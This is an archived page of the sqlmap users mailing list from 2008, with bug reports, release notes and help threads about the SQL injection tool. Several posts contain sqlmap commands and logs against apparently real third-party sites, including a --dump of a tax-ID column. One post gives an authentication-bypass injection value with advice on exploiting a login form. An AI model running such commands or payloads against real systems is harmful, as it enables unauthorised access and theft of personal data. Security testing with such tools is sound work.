sqlmap-users Mailing List for sqlmap (Page 144)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: Bernardo D. A. G. <ber...@gm...> - 2008-11-10 19:11:15
|
Hi Gabriel, Gabriel eu wrote: > ... > I would like to know if there is a chance that sqlmap will support > interbase and/or microsoft access in the future. Yes, there is a chance in the long run. Cheers, -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK) PGP Key ID: 0x05F5A30F |
|
From: Bernardo D. A. G. <ber...@gm...> - 2008-11-09 19:03:15
|
Hi Andres, Andres Riancho wrote: > ... > Feature request: let the users access the svn, so they can download > the latest updates and test if the patches you apply to the software > really work for them. In this way, users won't have to way to the next > release to be able to test it =) sqlmap Subversion repository is now online on https://svn.sqlmap.org/sqlmap/trunk/sqlmap/ You can checkout it if you want to give a try to the development version. Cheers, -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK) PGP Key ID: 0x05F5A30F |
|
From: Bernardo D. A. G. <ber...@gm...> - 2008-11-09 15:16:24
|
Hi Gabriel, I recently fixed this bug, it will be on sqlmap 0.6.3. As a short-term workaround do not provide the column name for the moment. Cheers, Bernardo Gabriel eu wrote: > > ./sqlmap.py -u "http://www.abp.com.br/namidia/index.asp?id=857" > --dbms="Mysql" -D abp1 -T tblassociados -C txtCNPJOuCPF -v1 -p id --dump > > sqlmap version: 0.6.2 > Python version: 2.5 > Operating system: linux2 > Traceback (most recent call last): > File "./sqlmap.py", line 74, in main > start() > File > "/home/gabriel/exploits/sql_injection/sqlmap-0.6.2/lib/controller/controller.py", > line 239, in start > action() > File > "/home/gabriel/exploits/sql_injection/sqlmap-0.6.2/lib/controller/action.py", > line 106, in action > dumper.dbTableValues(conf.dbmsHandler.dumpTable()) > File > "/home/gabriel/exploits/sql_injection/sqlmap-0.6.2/plugins/generic/enumeration.py", > line 829, in dumpTable > for column in colList: > UnboundLocalError: local variable 'colList' referenced before assignment -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK) PGP Key ID: 0x05F5A30F |
|
From: Andres R. <and...@gm...> - 2008-11-09 14:47:40
|
Bernardo, On Sun, Nov 9, 2008 at 12:36 PM, Bernardo Damele A. G. <ber...@gm...> wrote: > Hi Kyprianos, > > I am catching this exception now. It will be into sqlmap 0.6.3. > Thanks for notifying the issue. Feature request: let the users access the svn, so they can download the latest updates and test if the patches you apply to the software really work for them. In this way, users won't have to way to the next release to be able to test it =) > Cheers, > Bernardo > > Kyprianos Vassilopoulos wrote: >> ... >> ERROR] unhandled exception >> in sqlm >> ap/0.6.2, please copy the command line and the following text and send >> by e-mail >> to ber...@gm... <mailto:ber...@gm...>. I will >> fix it as soon as possible: >> sqlmap version: 0.6.2 >> Python version: 2.5.2 >> Operating system: win32 >> Traceback (most recent call last): >> File "sqlmap.py", line 74, in main >> File "lib\controller\controller.pyc", line 239, in start >> File "lib\controller\action.pyc", line 90, in action >> File "plugins\generic\enumeration.pyc", line 207, in getPasswordHashes >> File "plugins\generic\enumeration.pyc", line 151, in getUsers >> File "lib\request\inject.pyc", line 379, in getValue >> File "lib\request\inject.pyc", line 284, in __goInferenceProxy >> File "lib\request\inject.pyc", line 89, in __goInferenceFields >> File "lib\request\inject.pyc", line 65, in __goInference >> File "lib\techniques\inference\blind.pyc", line 188, in bisection >> File "lib\techniques\inference\blind.pyc", line 97, in getChar >> File "lib\request\connect.pyc", line 224, in queryPage >> File "lib\request\connect.pyc", line 143, in getPage >> File "socket.pyc", line 291, in read >> File "httplib.pyc", line 509, in read >> File "httplib.pyc", line 554, in _read_chunked >> File "httplib.pyc", line 602, in _safe_read >> File "socket.pyc", line 309, in read >> error: (10054, 'Connection reset by peer') >> >> [*] shutting down at: 02:12:44 > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK) > PGP Key ID: 0x05F5A30F > > ------------------------------------------------------------------------- > This SF.Net email is sponsored by the Moblin Your Move Developer's challenge > Build the coolest Linux based applications with Moblin SDK & win great prizes > Grand prize is a trip for two to an Open Source event anywhere in the world > http://moblin-contest.org/redirect.php?banner_id=100&url=/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Andres Riancho http://w3af.sourceforge.net/ Web Application Attack and Audit Framework |
|
From: Bernardo D. A. G. <ber...@gm...> - 2008-11-09 14:36:40
|
Hi Kyprianos, I am catching this exception now. It will be into sqlmap 0.6.3. Thanks for notifying the issue. Cheers, Bernardo Kyprianos Vassilopoulos wrote: > ... > ERROR] unhandled exception > in sqlm > ap/0.6.2, please copy the command line and the following text and send > by e-mail > to ber...@gm... <mailto:ber...@gm...>. I will > fix it as soon as possible: > sqlmap version: 0.6.2 > Python version: 2.5.2 > Operating system: win32 > Traceback (most recent call last): > File "sqlmap.py", line 74, in main > File "lib\controller\controller.pyc", line 239, in start > File "lib\controller\action.pyc", line 90, in action > File "plugins\generic\enumeration.pyc", line 207, in getPasswordHashes > File "plugins\generic\enumeration.pyc", line 151, in getUsers > File "lib\request\inject.pyc", line 379, in getValue > File "lib\request\inject.pyc", line 284, in __goInferenceProxy > File "lib\request\inject.pyc", line 89, in __goInferenceFields > File "lib\request\inject.pyc", line 65, in __goInference > File "lib\techniques\inference\blind.pyc", line 188, in bisection > File "lib\techniques\inference\blind.pyc", line 97, in getChar > File "lib\request\connect.pyc", line 224, in queryPage > File "lib\request\connect.pyc", line 143, in getPage > File "socket.pyc", line 291, in read > File "httplib.pyc", line 509, in read > File "httplib.pyc", line 554, in _read_chunked > File "httplib.pyc", line 602, in _safe_read > File "socket.pyc", line 309, in read > error: (10054, 'Connection reset by peer') > > [*] shutting down at: 02:12:44 -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK) PGP Key ID: 0x05F5A30F |
|
From: Zinho <zi...@ha...> - 2008-11-08 19:13:08
|
Ciao Bernardo ( ;) italiano anche io) Following up with the response you gave to Dan about injection in login form I have tried to put test'+OR+'1'='1');-- in the data parameter (because this is the way to bypass the auth through sqli and get the string) but I receive [ERROR] all testable parameters you provided are not present within t he GET, POST and Cookie parameters It seems that the problem is in the '=' character in the data parameter. I tried it both using sqlmap.conf and inline parameters with no luck Any suggestion on this will be very appreciated. -- ---- Zinho Webmaster and Founder Hackers Center Internet Security Portal www.hackerscenter.com |
|
From: Bernardo D. A. G. <ber...@gm...> - 2008-11-06 09:53:31
|
Fixed in 0.6.2, get it from official site as usual. On Wed, Nov 5, 2008 at 22:58, x3k9975 <x3...@gm...> wrote: > [20:57:13] [ERROR] unhandled exception in sqlmap/0.6.1, please copy the > command line and the following text and send by e-mail to > ber...@gm.... I will fix it as soon as possible: > sqlmap version: 0.6.1 > Python version: 2.5.1 > Operating system: linux2 > Traceback (most recent call last): > File "/usr/bin/sqlmap", line 74, in main > start() > File "/usr/share/sqlmap/lib/controller/controller.py", line 239, in start > action() > File "/usr/share/sqlmap/lib/controller/action.py", line 69, in action > print "back-end DBMS:\t%s\n" % conf.dbmsHandler.getFingerprint() > File "/usr/share/sqlmap/plugins/dbms/mysql.py", line 179, in getFingerprint > comVer = self.__commentCheck() > File "/usr/share/sqlmap/plugins/dbms/mysql.py", line 160, in __commentCheck > midVer = prevVer[2] > TypeError: 'NoneType' object is unsubscriptable -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK) PGP Key ID: 0x05F5A30F |
|
From: Bernardo D. A. G. <ber...@gm...> - 2008-11-04 16:56:48
|
Hi, I am glad to release sqlmap 0.6.2. Thanks to anyone of you that contributed with really appreciated and useful feedback. Changes ======= Some of the new features include: * Major bug fix to correctly dump tables entries when --stop is not specified; * Major bug fix so that the users' privileges enumeration now works properly also on both MySQL < 5.0 and MySQL >= 5.0; * Major bug fix when the request is POST to also send the GET parameters if any have been provided; * Major bug fix to correctly update sqlmap to the latest stable release with command line --update; * Major bug fix so that when the expected value of a query (count variable) is an integer and, for some reasons, its resumed value from the session file is a string or a binary file, the query is executed again and its new output saved to the session file; Complete list of changes at http://sqlmap.sourceforge.net/doc/ChangeLog. Download ======== You can download it in various formats: * Source gzip compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.2.tar.gz * Source bzip2 compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.2.tar.bz2 * Source zip compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.2.zip * DEB binary package, http://downloads.sourceforge.net/sqlmap/sqlmap_0.6.2-1_all.deb * RPM binary package, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.2-1.noarch.rpm * Portable executable for Windows that does not require the Python interpreter to be installed on the operating system, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.2_exe.zip Documentation ============= * sqlmap user's manual: http://sqlmap.sourceforge.net/doc/README.pdf * sqlmap developer's documentation: http://sqlmap.sourceforge.net/dev/ Happy hacking! -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK) PGP Key ID: 0x05F5A30F |
|
From: Bernardo D. A. G. <ber...@gm...> - 2008-11-02 19:24:52
|
Hi Dan, Change the parameters to something similar to: username=test'+OR+'1'='1 password=test'+OR+'1'='1 and find the string with differs in the page content depending on the valid and not valid login, then provide the valid string with --string option. Refer to the sqlmap user's manual for details on --string command line option. Cheers, Bernardo Dan Guido wrote: > Hi Bernardo, Daniele, > > If I've located a SQL injection in the login form of a website, how > should I configure sqlmap to exploit it if I don't know the username > and password of a valid user? The page always fails the sqlmap > "dynamic" check because I can't get valid authentication credentials, > however, a SQL error is clearly displayed to the screen. > > Thanks. > > -- > Dan Guido -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK) PGP Key ID: 0x05F5A30F |
|
From: Bernardo D. A. G. <ber...@gm...> - 2008-11-02 14:32:47
|
Actually the --start option is broken in sqlmap 0.6.1. I will release soon version 0.6.2 with this and a few others bug fixes. barry smith wrote: > Hello, > > I'm missing a feature in your software. I have a bad connection that > breaks often. I want to use --start when enumerating columns like this > "--columns -T table -D database --start 40". My attempts to modify > sqlmap has been futile, but I'm a newbie with python so it was to be > expected. Could you tell me if it's possible without a lot of fuzz to > edit sqlmap to include this feature? Is there a file that I can set the > column enumerating start limit to a value other than 0 without effecting > the other start limits? Thank you for your time. -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK) PGP Key ID: 0x05F5A30F |
|
From: barry s. <ket...@ya...> - 2008-11-02 07:44:08
|
Hello,
I'm missing a feature in your software. I have a bad connection that breaks often. I want to use --start when enumerating columns like this "--columns -T table -D database --start 40". My attempts to modify sqlmap has been futile, but I'm a newbie with python so it was to be expected. Could you tell me if it's possible without a lot of fuzz to edit sqlmap to include this feature? Is there a file that I can set the column enumerating start limit to a value other than 0 without effecting the other start limits? Thank you for your time.
|
|
From: Bernardo D. A. G. <ber...@gm...> - 2008-10-24 10:56:53
|
Hi Andres, On Tue, Oct 21, 2008 at 14:51, Andres Riancho <and...@gm...> wrote: > ... > Maybe you could define that as a default for postgresql? > Something like... > > $ ./sqlmap ... --enumerate-tables > ... > fingerprinted as postgresql > ... > you didn't specified the table name, using "public" as default. > ... > working... results: > $ Good point. It will be implemented in sqlmap 0.7. -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK) PGP Key ID: 0x05F5A30F |
|
From: Bernardo D. A. G. <ber...@gm...> - 2008-10-22 15:12:34
|
Hi Freeman, On Wed, Oct 22, 2008 at 09:33, Freeman Y. <fre...@la...> wrote: > ... > Sorry I was mistaken, I thought that if I had the DB name then it could > enumerate the tables with -D tablename and --tables even if MySQL is < 5.0. I will improve it in sqlmap 0.7. For the moment no table/column enumeration is possible on MySQL < 5.0 even if you provide the DB name. Cheers, -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK) PGP Key ID: 0x05F5A30F |
|
From: Bernardo D. A. G. <ber...@gm...> - 2008-10-22 08:55:06
|
Hi Freeman, On Wed, Oct 22, 2008 at 00:40, Freeman Y. <fre...@la...> wrote: > ... > [...] > [16:36:06] [INFO] query: SELECT 0 FROM information_schema.TABLES LIMIT 0, 1 > [16:36:06] [INFO] retrieved: > [16:36:11] [INFO] performed 6 queries in 5 seconds > back-end DBMS: MySQL < 5.0.0 > > [16:36:11] [ERROR] information_schema not available, back-end DBMS is MySQL > < 5. > 0 > > [*] shutting down at: 16:36:11 > > If you look I did use -D and then --tables. What am I doing wrong? As you can see from sqlmap messages, the remote DBMS is MySQL < 5.0 so it has not information_schema. If you assume it is MySQL >= 5.0 so the current user does not have access to the information_schema system database. Cheers, -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK) PGP Key ID: 0x05F5A30F |
|
From: Freeman Y. <fre...@la...> - 2008-10-22 08:37:45
|
Bernardo Damele A. G. wrote: > Hi Freeman, > > On Wed, Oct 22, 2008 at 00:40, Freeman Y. <fre...@la...> wrote: > >> ... >> [...] >> [16:36:06] [INFO] query: SELECT 0 FROM information_schema.TABLES LIMIT 0, 1 >> [16:36:06] [INFO] retrieved: >> [16:36:11] [INFO] performed 6 queries in 5 seconds >> back-end DBMS: MySQL < 5.0.0 >> >> [16:36:11] [ERROR] information_schema not available, back-end DBMS is MySQL >> < 5. >> 0 >> >> [*] shutting down at: 16:36:11 >> >> If you look I did use -D and then --tables. What am I doing wrong? >> > > As you can see from sqlmap messages, the remote DBMS is MySQL < 5.0 so > it has not information_schema. If you assume it is MySQL >= 5.0 so the > current user does not have access to the information_schema system > database. > > Cheers, > Sorry I was mistaken, I thought that if I had the DB name then it could enumerate the tables with -D tablename and --tables even if MySQL is < 5.0. Do you have any suggestions as how to attack this type of DB then? I'm somewhat new to SQL injections, please bear with me :) Thanks for your help! |
|
From: Freeman Y. <fre...@la...> - 2008-10-21 23:40:46
|
Bernardo Damele A. G. wrote:
> Hi Freeman,
>
> On Tue, Oct 21, 2008 at 07:17, Freeman Y. <fre...@la...> wrote:
>
>> Am I still not able to enumerate tables in a DB even though i have the
>> DB name in MySQL 5.0.0?
>>
>
> In a default configuration of MySQL >= 5.0 there is the
> information_schema system database which sqlmap uses to enumerate DB,
> tables, etc.
>
>
>> I understand that I cannot get a list of DBs because of no
>> information_schema, but even if I have a DB name I cannot enumerate the
>> tables?
>> If not, how else can I attack a 5.0.0 server?
>>
>
> If you read the documentation carefully, or even just run sqlmap with
> -h option, you see that you can provide the DB name with -D option
> together with the --tables option to enumerate its tables.
>
> Cheers,
>
Thanks but I already tried that. Here's the output with the site removed:
/C:\sqlmap>sqlmap -u http://somerandomsite/index.php?id=123 -v 1 --curre
nt-db --current-user
sqlmap/0.6.1 coded by Bernardo Damele A. G. <ber...@gm...>
and Daniele Bellucci <dan...@gm...>
[*] starting at: 16:26:47
[16:26:47] [INFO] testing connection to the target url
[...]
back-end DBMS: MySQL < 5.0.0
[16:27:42] [INFO] fetching current user
[16:27:42] [INFO] query: IFNULL(CAST(CURRENT_USER() AS CHAR(10000)),
CHAR(32))
[16:27:42] [INFO] retrieved: hyweljen_db@localhost
[16:30:33] [INFO] performed 153 queries in 171 seconds
current user: 'hyweljen_db@localhost'
[16:30:33] [INFO] fetching current database
[16:30:33] [INFO] query: IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))
[16:30:33] [INFO] retrieved: hyweljen_diverse
[16:32:38] [INFO] performed 118 queries in 125 seconds
current database: 'hyweljen_diverse'
[16:32:38] [INFO] Fetched data logged to text files under
'C:\sqlmap/output\randomsite'
[*] shutting down at: 16:32:38/
So I've found out that the database is hyweljen_diverse.. then I run this:
/
C:\sqlmap>sqlmap -u http://somerandomsite/index.php?id=123 -v 1 --eta -
-threads=2 -D hyweljen_diverse --tables
sqlmap/0.6.1 coded by Bernardo Damele A. G. <ber...@gm...>
and Daniele Bellucci <dan...@gm...>
[*] starting at: 16:35:20
[16:35:20] [INFO] testing connection to the target url
[...]
[16:36:06] [INFO] query: SELECT 0 FROM information_schema.TABLES LIMIT 0, 1
[16:36:06] [INFO] retrieved:
[16:36:11] [INFO] performed 6 queries in 5 seconds
back-end DBMS: MySQL < 5.0.0
[16:36:11] [ERROR] information_schema not available, back-end DBMS is
MySQL < 5.
0
[*] shutting down at: 16:36:11/
If you look I did use -D and then --tables. What am I doing wrong?
Thanks
|
|
From: Andres R. <and...@gm...> - 2008-10-21 13:52:03
|
Bernardo, On Tue, Oct 21, 2008 at 6:34 AM, Bernardo Damele A. G. <ber...@gm...> wrote: > Hi, > > On Tue, Oct 21, 2008 at 08:09, v4d25f7gb2e7 tgb4sr02be24 > <ve7...@gm...> wrote: >> ... >> C:\My Documents\sqlmap-0.6.1_exe>sqlmap -v 2 --eta -u "http://192.168.0.31/sqlte >> st.php?id=1" -s c:\resume.log -D database1 --tables >> >> sqlmap/0.6.1 coded by Bernardo Damele A. G. <ber...@gm...> >> and Daniele Bellucci <dan...@gm...> >> >> [*] starting at: 15:54:37 >> >> [15:54:37] [INFO] resuming injection point 'GET' from session file >> [15:54:37] [INFO] resuming injection parameter 'id' from session file >> [15:54:37] [INFO] resuming injection type 'numeric' from session file >> [15:54:37] [INFO] resuming 0 number of parenthesis from session file >> [15:54:37] [INFO] resuming back-end DBMS 'PostgreSQL' from session file >> [15:54:37] [INFO] testing connection to the target url >> back-end DBMS: PostgreSQL >> >> [15:54:38] [INFO] fetching tables for database 'database1' >> [15:54:38] [INFO] fetching number of tables for database 'database1' >> [15:54:38] [INFO] query: SELECT COALESCE(CAST(COUNT(tablename) AS CHARACTER(1000 >> 0)), (CHR(32))) FROM pg_tables WHERE schemaname=(CHR(100)||CHR(97)||CHR(116)||CH >> R(97)||CHR(98)||CHR(97)||CHR(115)||CHR(101)||CHR(49)) >> [15:54:38] [INFO] retrieved: 0 >> [15:54:40] [INFO] performed 13 queries in 1 seconds >> [15:54:40] [WARNING] unable to retrieve the number of tables for database 'datab >> ase1' >> [15:54:40] [ERROR] unable to retrieve the tables for any database > > As you can read from sqlmap documentation online[1] or on the doc/ folder: > > "Note that on PostgreSQL you have to provide public or the name of a > system database because it is not possible to enumerate other > databases tables, only the users' schema that the web application's > user is connected to, which is always public." > > So on PostgreSQL if you want to retrieve the tables for the current > database provide 'public' as DB name. > > On others DBMS it works. Refer to sqlmap documentation examples. Maybe you could define that as a default for postgresql? Something like... $ ./sqlmap ... --enumerate-tables ... fingerprinted as postgresql ... you didn't specified the table name, using "public" as default. ... working... results: $ > [1] http://sqlmap.sourceforge.net/doc/README.html#ss5.4 > > Cheers, > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK) > PGP Key ID: 0x05F5A30F > > ------------------------------------------------------------------------- > This SF.Net email is sponsored by the Moblin Your Move Developer's challenge > Build the coolest Linux based applications with Moblin SDK & win great prizes > Grand prize is a trip for two to an Open Source event anywhere in the world > http://moblin-contest.org/redirect.php?banner_id=100&url=/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Andres Riancho http://w3af.sourceforge.net/ Web Application Attack and Audit Framework |
|
From: Bernardo D. A. G. <ber...@gm...> - 2008-10-21 08:45:05
|
Hi, On Tue, Oct 21, 2008 at 08:09, v4d25f7gb2e7 tgb4sr02be24 <ve7...@gm...> wrote: > ... > C:\My Documents\sqlmap-0.6.1_exe>sqlmap -v 2 --eta -u "http://192.168.0.31/sqlte > st.php?id=1" -s c:\resume.log -D database1 --tables > > sqlmap/0.6.1 coded by Bernardo Damele A. G. <ber...@gm...> > and Daniele Bellucci <dan...@gm...> > > [*] starting at: 15:54:37 > > [15:54:37] [INFO] resuming injection point 'GET' from session file > [15:54:37] [INFO] resuming injection parameter 'id' from session file > [15:54:37] [INFO] resuming injection type 'numeric' from session file > [15:54:37] [INFO] resuming 0 number of parenthesis from session file > [15:54:37] [INFO] resuming back-end DBMS 'PostgreSQL' from session file > [15:54:37] [INFO] testing connection to the target url > back-end DBMS: PostgreSQL > > [15:54:38] [INFO] fetching tables for database 'database1' > [15:54:38] [INFO] fetching number of tables for database 'database1' > [15:54:38] [INFO] query: SELECT COALESCE(CAST(COUNT(tablename) AS CHARACTER(1000 > 0)), (CHR(32))) FROM pg_tables WHERE schemaname=(CHR(100)||CHR(97)||CHR(116)||CH > R(97)||CHR(98)||CHR(97)||CHR(115)||CHR(101)||CHR(49)) > [15:54:38] [INFO] retrieved: 0 > [15:54:40] [INFO] performed 13 queries in 1 seconds > [15:54:40] [WARNING] unable to retrieve the number of tables for database 'datab > ase1' > [15:54:40] [ERROR] unable to retrieve the tables for any database As you can read from sqlmap documentation online[1] or on the doc/ folder: "Note that on PostgreSQL you have to provide public or the name of a system database because it is not possible to enumerate other databases tables, only the users' schema that the web application's user is connected to, which is always public." So on PostgreSQL if you want to retrieve the tables for the current database provide 'public' as DB name. On others DBMS it works. Refer to sqlmap documentation examples. [1] http://sqlmap.sourceforge.net/doc/README.html#ss5.4 Cheers, -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK) PGP Key ID: 0x05F5A30F |
|
From: Bernardo D. A. G. <ber...@gm...> - 2008-10-21 08:37:06
|
Hi Freeman, On Tue, Oct 21, 2008 at 07:17, Freeman Y. <fre...@la...> wrote: > Am I still not able to enumerate tables in a DB even though i have the > DB name in MySQL 5.0.0? In a default configuration of MySQL >= 5.0 there is the information_schema system database which sqlmap uses to enumerate DB, tables, etc. > I understand that I cannot get a list of DBs because of no > information_schema, but even if I have a DB name I cannot enumerate the > tables? > If not, how else can I attack a 5.0.0 server? If you read the documentation carefully, or even just run sqlmap with -h option, you see that you can provide the DB name with -D option together with the --tables option to enumerate its tables. Cheers, -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK) PGP Key ID: 0x05F5A30F |
|
From: v4d25f7gb2e7 t. <ve7...@gm...> - 2008-10-21 07:10:05
|
I have some troubles.
I was able to get DB names(--dbs) and current DB name(--current-db).
But I was not able to enumerate tables in current DB(-D databasename --tables).
I tried it on MS SQLServer, MySQL and PostgreSQL,
on Windows and Linux.
with sqlmap 0.6.1 and 0.6
But all the results were failure.
Is this a bug?
Please give information.
log
--------------------------------------------------------------------------------------------------------------------------------------------------
C:\My Documents\sqlmap-0.6.1_exe>sqlmap -v 2 --eta -u "http://192.168.0.31/sqlte
st.php?id=1" -s c:\resume.log -D database1 --tables
sqlmap/0.6.1 coded by Bernardo Damele A. G. <ber...@gm...>
and Daniele Bellucci <dan...@gm...>
[*] starting at: 15:54:37
[15:54:37] [INFO] resuming injection point 'GET' from session file
[15:54:37] [INFO] resuming injection parameter 'id' from session file
[15:54:37] [INFO] resuming injection type 'numeric' from session file
[15:54:37] [INFO] resuming 0 number of parenthesis from session file
[15:54:37] [INFO] resuming back-end DBMS 'PostgreSQL' from session file
[15:54:37] [INFO] testing connection to the target url
back-end DBMS: PostgreSQL
[15:54:38] [INFO] fetching tables for database 'database1'
[15:54:38] [INFO] fetching number of tables for database 'database1'
[15:54:38] [INFO] query: SELECT COALESCE(CAST(COUNT(tablename) AS CHARACTER(1000
0)), (CHR(32))) FROM pg_tables WHERE schemaname=(CHR(100)||CHR(97)||CHR(116)||CH
R(97)||CHR(98)||CHR(97)||CHR(115)||CHR(101)||CHR(49))
[15:54:38] [INFO] retrieved: 0
[15:54:40] [INFO] performed 13 queries in 1 seconds
[15:54:40] [WARNING] unable to retrieve the number of tables for database 'datab
ase1'
[15:54:40] [ERROR] unable to retrieve the tables for any database
[*] shutting down at: 15:54:40
|
|
From: Freeman Y. <fre...@la...> - 2008-10-21 06:17:22
|
Am I still not able to enumerate tables in a DB even though i have the DB name in MySQL 5.0.0? I understand that I cannot get a list of DBs because of no information_schema, but even if I have a DB name I cannot enumerate the tables? If not, how else can I attack a 5.0.0 server? Thanks |
|
From: Bernardo D. A. G. <ber...@gm...> - 2008-10-20 14:47:32
|
Hi, I am glad to release sqlmap version 0.6.1. Thanks to anyone of you that contributed with really appreciated and useful feedback. Changes ======= Some of the new features include: * Added a Metasploit Framework 3 auxiliary module to run sqlmap; * Implemented possibility to test for and inject also on LIKE statements; * Implemented --start and --stop options to set the first and the last table entry to dump; * Added non-interactive/batch-mode (--batch) option to make it easy to wrap sqlmap in Metasploit and any other tool. Complete list of changes at http://sqlmap.sourceforge.net/doc/ChangeLog. Download ======== You can download it in various formats: * Source gzip compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.tar.gz * Source bzip2 compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.tar.bz2 * Source zip compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.zip * DEB binary package, http://downloads.sourceforge.net/sqlmap/sqlmap_0.6.1-1_all.deb * RPM binary package, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1-1.noarch.rpm * Portable executable for Windows that does not require the Python interpreter to be installed on the operating system, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1_exe.zip Documentation ============= * sqlmap user's manual: http://sqlmap.sourceforge.net/doc/README.pdf * sqlmap developer's documentation: http://sqlmap.sourceforge.net/dev/ Happy hacking! -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK) PGP Key ID: 0x05F5A30F |
|
From: Christian E. E. <c_e...@ya...> - 2008-09-01 14:10:17
|
----- Messaggio originale ----- Da: Bernardo Damele A. G. <ber...@gm...> A: sql...@li... Inviato: Lunedì 1 settembre 2008, 16:03:12 Oggetto: Re: [sqlmap-users] sqlmap 0.6 released -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi Christian, Christian Eric EDJENGUELE wrote: > Great!, > it's well documented, but the user documention is not part of the program as well as the developer manual. it should be interesting to have a offline version of the developer manual with source code. The user's manual is part of the sqlmap packages. You can find it at doc/README.[html|pdf]. the user manual is't part of windows binary :) as well as doc directory! The developer's documentation is not part of the sqlmap package, it's only available online because it's 4.8 Mb of files, but I will consider to create a compressed package out of it and upload it to the SourceForge File List page too. - -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile number: +39-3493821385 PGP Key ID: 0x05F5A30F -----BEGIN PGP SIGNATURE----- Version: 